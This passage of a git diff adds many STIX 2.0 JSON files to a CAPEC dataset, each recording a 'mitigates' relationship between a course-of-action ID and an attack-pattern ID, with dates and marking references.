"attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6121b719-1dbf-44cb-b2a7-70d531a099de.json b/capec/relationship/relationship--6121b719-1dbf-44cb-b2a7-70d531a099de.json new file mode 100644 index 0000000000..3a7b000ca2 --- /dev/null +++ b/capec/relationship/relationship--6121b719-1dbf-44cb-b2a7-70d531a099de.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fb7bc455-fe33-4901-b69d-77c36b879446", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6121b719-1dbf-44cb-b2a7-70d531a099de", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691", + "target_ref": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--61d1908c-b43b-4bb5-848f-b008a12c4bc6.json b/capec/relationship/relationship--61d1908c-b43b-4bb5-848f-b008a12c4bc6.json new file mode 100644 index 0000000000..c3287ac36a --- /dev/null +++ b/capec/relationship/relationship--61d1908c-b43b-4bb5-848f-b008a12c4bc6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--81fcfda1-da0f-4beb-b928-02b8542b7fd3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--61d1908c-b43b-4bb5-848f-b008a12c4bc6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffdecd8a-8e97-49ec-9a26-3a5507430430", + "target_ref": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--61e1e477-f922-44ee-b627-9b4c8a43841f.json b/capec/relationship/relationship--61e1e477-f922-44ee-b627-9b4c8a43841f.json new file mode 100644 index 0000000000..4a06e42792 --- /dev/null +++ b/capec/relationship/relationship--61e1e477-f922-44ee-b627-9b4c8a43841f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--29515a1d-0c95-440c-b587-b7f53882f843", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--61e1e477-f922-44ee-b627-9b4c8a43841f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", + "target_ref": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--61ec212b-f2a8-4522-a8fe-cf1c6a3a709c.json b/capec/relationship/relationship--61ec212b-f2a8-4522-a8fe-cf1c6a3a709c.json new file mode 100644 index 0000000000..2ebc00d1eb --- /dev/null +++ b/capec/relationship/relationship--61ec212b-f2a8-4522-a8fe-cf1c6a3a709c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a34b8907-679e-4689-9b22-c8613b8b4669", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--61ec212b-f2a8-4522-a8fe-cf1c6a3a709c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93", + "target_ref": "attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--61f97eb6-92ac-4930-a8ef-145d7f2aa435.json b/capec/relationship/relationship--61f97eb6-92ac-4930-a8ef-145d7f2aa435.json new file mode 100644 index 0000000000..321dcec0b2 --- /dev/null +++ b/capec/relationship/relationship--61f97eb6-92ac-4930-a8ef-145d7f2aa435.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7c9ba149-35a9-412e-8662-f215d31e0fa2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--61f97eb6-92ac-4930-a8ef-145d7f2aa435", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7", + "target_ref": "attack-pattern--81e9276b-c981-4816-b54c-dc6866cbcd95", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--620c1f68-4871-421e-b086-fb7f087aec4b.json b/capec/relationship/relationship--620c1f68-4871-421e-b086-fb7f087aec4b.json new file mode 100644 index 0000000000..281d77add1 --- /dev/null +++ b/capec/relationship/relationship--620c1f68-4871-421e-b086-fb7f087aec4b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e4ef5a67-5e5b-4dbe-8cfc-73451cf0a49d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--620c1f68-4871-421e-b086-fb7f087aec4b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a", + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--62943b91-e6a3-4141-8467-b02dcb8536cc.json b/capec/relationship/relationship--62943b91-e6a3-4141-8467-b02dcb8536cc.json new file mode 100644 index 0000000000..f91e200165 --- /dev/null +++ b/capec/relationship/relationship--62943b91-e6a3-4141-8467-b02dcb8536cc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--37cd6647-6d8d-45d9-b070-8eee3d15e7c8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--62943b91-e6a3-4141-8467-b02dcb8536cc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--31915125-c52a-4627-a701-7170b8709fbc", + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--62b38252-4ca0-4124-a8d9-844640dc0ddc.json b/capec/relationship/relationship--62b38252-4ca0-4124-a8d9-844640dc0ddc.json new file mode 100644 index 0000000000..c8e6e0bb9b --- /dev/null +++ b/capec/relationship/relationship--62b38252-4ca0-4124-a8d9-844640dc0ddc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d409f2ee-7df1-4662-b89f-c6718bddf8df", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--62b38252-4ca0-4124-a8d9-844640dc0ddc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--60486ac0-e215-4bc0-b0d7-aeaab2a90b9b", + "target_ref": "attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--63134f93-a8ab-4f25-99e4-852f3bbdcfea.json b/capec/relationship/relationship--63134f93-a8ab-4f25-99e4-852f3bbdcfea.json new file mode 100644 index 0000000000..c789a7f6a5 --- /dev/null +++ b/capec/relationship/relationship--63134f93-a8ab-4f25-99e4-852f3bbdcfea.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d5a75333-d62c-48a2-b122-e4a4ef877405", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--63134f93-a8ab-4f25-99e4-852f3bbdcfea", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327", + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6320ea75-da4c-4cfc-b6b1-adbdfedbd0af.json b/capec/relationship/relationship--6320ea75-da4c-4cfc-b6b1-adbdfedbd0af.json new file mode 100644 index 0000000000..be447f1b36 --- /dev/null +++ b/capec/relationship/relationship--6320ea75-da4c-4cfc-b6b1-adbdfedbd0af.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--20d11b44-aa9f-463c-b034-6edc00e7c394", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6320ea75-da4c-4cfc-b6b1-adbdfedbd0af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--63a3e5e0-4c23-4cc0-964c-5cb7da03622b.json b/capec/relationship/relationship--63a3e5e0-4c23-4cc0-964c-5cb7da03622b.json new file mode 100644 index 0000000000..5f4c8abccc --- /dev/null +++ b/capec/relationship/relationship--63a3e5e0-4c23-4cc0-964c-5cb7da03622b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--aad85391-2a54-4014-a3f3-20e024e42537", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--63a3e5e0-4c23-4cc0-964c-5cb7da03622b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555", + "target_ref": "attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--63e56fbd-3e71-4909-b55a-f855c06cd5e9.json b/capec/relationship/relationship--63e56fbd-3e71-4909-b55a-f855c06cd5e9.json new file mode 100644 index 0000000000..10fd7cd95c --- /dev/null +++ b/capec/relationship/relationship--63e56fbd-3e71-4909-b55a-f855c06cd5e9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a716f482-0f45-4e3a-a9cf-b394ba2160a0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--63e56fbd-3e71-4909-b55a-f855c06cd5e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", + "target_ref": "attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--64966529-b5e0-482f-996d-d189acd5e2c2.json b/capec/relationship/relationship--64966529-b5e0-482f-996d-d189acd5e2c2.json new file mode 100644 index 0000000000..d97a7f60e1 --- /dev/null +++ b/capec/relationship/relationship--64966529-b5e0-482f-996d-d189acd5e2c2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ec3ac816-2fad-4e1f-9528-95ca4110b9eb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--64966529-b5e0-482f-996d-d189acd5e2c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4eeff40-80b8-46a1-a647-8b02f513e65f", + "target_ref": "attack-pattern--e2589b81-3fc0-4d42-ae48-f6825433bff3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--64c63aad-a2ec-43f1-bd16-fa25e56f3fa0.json b/capec/relationship/relationship--64c63aad-a2ec-43f1-bd16-fa25e56f3fa0.json new file mode 100644 index 0000000000..31ea0beb36 --- /dev/null +++ b/capec/relationship/relationship--64c63aad-a2ec-43f1-bd16-fa25e56f3fa0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b37ef9c4-8732-4d04-bbff-a0f062066361", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--64c63aad-a2ec-43f1-bd16-fa25e56f3fa0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0337ce50-78c7-41df-bfe9-8a1054ed5e4f", + "target_ref": "attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--64dda55d-3c5a-4ce9-95f5-2ad9f1d90777.json b/capec/relationship/relationship--64dda55d-3c5a-4ce9-95f5-2ad9f1d90777.json new file mode 100644 index 0000000000..9ecaea6507 --- /dev/null +++ b/capec/relationship/relationship--64dda55d-3c5a-4ce9-95f5-2ad9f1d90777.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f0c201ba-52b6-417d-b45a-55d253b97e89", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--64dda55d-3c5a-4ce9-95f5-2ad9f1d90777", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f5e96e7d-763e-4a94-b572-6045ebb70de2", + "target_ref": "attack-pattern--6466bbec-2e27-46ba-b910-8046649e65c8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--65aca9d5-6465-4751-8a32-2d21f9902c93.json b/capec/relationship/relationship--65aca9d5-6465-4751-8a32-2d21f9902c93.json new file mode 100644 index 0000000000..f1f9442ae4 --- /dev/null +++ b/capec/relationship/relationship--65aca9d5-6465-4751-8a32-2d21f9902c93.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b3d58bc2-e990-4faa-b44f-f0c50677be6f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--65aca9d5-6465-4751-8a32-2d21f9902c93", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2db6f425-6fb9-40de-9d29-7f217e0df641", + "target_ref": "attack-pattern--f612c585-96cc-4f6b-9587-a68398da8e7c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6617c9a5-b97d-4c1b-ad91-add566fd06f3.json b/capec/relationship/relationship--6617c9a5-b97d-4c1b-ad91-add566fd06f3.json new file mode 100644 index 0000000000..2f6b8dbf3c --- /dev/null +++ b/capec/relationship/relationship--6617c9a5-b97d-4c1b-ad91-add566fd06f3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--422ffbc2-d3e7-407a-b20d-c1a2ef99b974", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6617c9a5-b97d-4c1b-ad91-add566fd06f3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--95f18f82-c186-43df-937f-09ecf87853d6", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--661ecfe2-ad5b-4423-b9de-bc4207c7a310.json b/capec/relationship/relationship--661ecfe2-ad5b-4423-b9de-bc4207c7a310.json new file mode 100644 index 0000000000..f0a629cd56 --- /dev/null +++ b/capec/relationship/relationship--661ecfe2-ad5b-4423-b9de-bc4207c7a310.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--eb6433a6-e269-4ab1-b15a-81a1aceb02f2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--661ecfe2-ad5b-4423-b9de-bc4207c7a310", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--07a0e5e3-0911-4ece-a705-32ff4a2b913b", + "target_ref": "attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--66225a03-9adb-4232-b7ac-bcad772bc785.json b/capec/relationship/relationship--66225a03-9adb-4232-b7ac-bcad772bc785.json new file mode 100644 index 0000000000..5cbe967f6d --- /dev/null +++ b/capec/relationship/relationship--66225a03-9adb-4232-b7ac-bcad772bc785.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ec5a749b-b71c-44a6-b715-224ef373f1a7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--66225a03-9adb-4232-b7ac-bcad772bc785", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283", + "target_ref": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6644906e-a46d-4277-a227-55468449b656.json b/capec/relationship/relationship--6644906e-a46d-4277-a227-55468449b656.json new file mode 100644 index 0000000000..c21a95b898 --- /dev/null +++ b/capec/relationship/relationship--6644906e-a46d-4277-a227-55468449b656.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3da59e88-128a-4e81-b88b-ab0f8eaf68e5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6644906e-a46d-4277-a227-55468449b656", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a5433ba-7561-46db-a5d6-3f971efc2d6a", + "target_ref": "attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--6651e0e5-1a8d-492b-9b3e-1cb8f7aada75.json b/capec/relationship/relationship--6651e0e5-1a8d-492b-9b3e-1cb8f7aada75.json new file mode 100644 index 0000000000..601c51e407 --- /dev/null +++ b/capec/relationship/relationship--6651e0e5-1a8d-492b-9b3e-1cb8f7aada75.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f4af7777-4cd6-4abb-95db-68449d78e048", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--6651e0e5-1a8d-492b-9b3e-1cb8f7aada75", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9019abc7-8715-4102-9d16-de27541d1372", + "target_ref": "attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--67746908-f0b2-4fe4-94f9-06b7c35a332f.json b/capec/relationship/relationship--67746908-f0b2-4fe4-94f9-06b7c35a332f.json new file mode 100644 index 0000000000..0692941ecd --- /dev/null +++ b/capec/relationship/relationship--67746908-f0b2-4fe4-94f9-06b7c35a332f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--511e5005-725e-4a52-9daa-bb4b9d60998d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--67746908-f0b2-4fe4-94f9-06b7c35a332f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--679bcb7d-a2f7-4a35-8a99-323da9bfcc6f.json b/capec/relationship/relationship--679bcb7d-a2f7-4a35-8a99-323da9bfcc6f.json new file mode 100644 index 0000000000..04ada3185d --- /dev/null +++ b/capec/relationship/relationship--679bcb7d-a2f7-4a35-8a99-323da9bfcc6f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--238f7068-336f-4484-9ca4-24ffd8e5fdbb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--679bcb7d-a2f7-4a35-8a99-323da9bfcc6f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--882b19e3-3b15-46be-addd-876476f8e56d", + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--68570b2d-3374-4fb3-bb7c-1c2b6b87d903.json b/capec/relationship/relationship--68570b2d-3374-4fb3-bb7c-1c2b6b87d903.json new file mode 100644 index 0000000000..7e4fdfb77a --- /dev/null +++ b/capec/relationship/relationship--68570b2d-3374-4fb3-bb7c-1c2b6b87d903.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a0041477-72a8-47cc-873e-2ea0df96eff0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--68570b2d-3374-4fb3-bb7c-1c2b6b87d903", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--68b09834-18ce-46ff-9558-82361f5da99c.json b/capec/relationship/relationship--68b09834-18ce-46ff-9558-82361f5da99c.json new file mode 100644 index 0000000000..1139c68350 --- /dev/null +++ b/capec/relationship/relationship--68b09834-18ce-46ff-9558-82361f5da99c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7b8984b2-3495-4a7d-9fae-e340aa94e12f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--68b09834-18ce-46ff-9558-82361f5da99c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bce5f53e-f172-44e5-9663-605f8f248104", + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--68e38613-42e8-420c-9417-6b3ee3bbc892.json b/capec/relationship/relationship--68e38613-42e8-420c-9417-6b3ee3bbc892.json new file mode 100644 index 0000000000..57e2fff751 --- /dev/null +++ b/capec/relationship/relationship--68e38613-42e8-420c-9417-6b3ee3bbc892.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f9d88d94-19f1-4e65-8962-17a2dac68bc7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--68e38613-42e8-420c-9417-6b3ee3bbc892", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e", + "target_ref": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--691c73d9-4383-47a1-8fed-889f5882e593.json b/capec/relationship/relationship--691c73d9-4383-47a1-8fed-889f5882e593.json new file mode 100644 index 0000000000..d76c1a197a --- /dev/null +++ b/capec/relationship/relationship--691c73d9-4383-47a1-8fed-889f5882e593.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3948073d-d2b0-42b7-9a78-17940ba29d9c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--691c73d9-4383-47a1-8fed-889f5882e593", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab", + "target_ref": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--699df3cb-52b6-452d-a09a-7cb661ec36da.json b/capec/relationship/relationship--699df3cb-52b6-452d-a09a-7cb661ec36da.json new file mode 100644 index 0000000000..086111af09 --- /dev/null +++ b/capec/relationship/relationship--699df3cb-52b6-452d-a09a-7cb661ec36da.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f2fb1385-068d-41db-a22c-8855ca3e633f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--699df3cb-52b6-452d-a09a-7cb661ec36da", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": 